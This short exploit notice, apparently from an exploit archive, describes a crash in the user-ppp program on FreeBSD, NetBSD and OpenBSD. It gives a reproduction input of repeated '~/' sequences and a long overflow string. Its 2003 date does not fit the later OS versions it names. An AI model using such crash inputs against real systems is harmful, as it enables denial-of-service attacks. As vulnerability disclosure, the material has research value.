/***********************************************************************************/
/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher***/
/*** 2003 / 12 /23 - PRIVATE CODE ***/
/*** Program terminated with signal 11, Segmentation fault. ***/
/*** #0 0xbeefdead in ?? () ***/
/***********************************************************************************/
I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on
OpenBSD (unconfirmed on 4.2)
Steps to reproduce:
Run ppp
type the following (or atleat some variation of)
~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
This will produce a segmentation violation (Core dumped).
Discovered by: sipher
Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet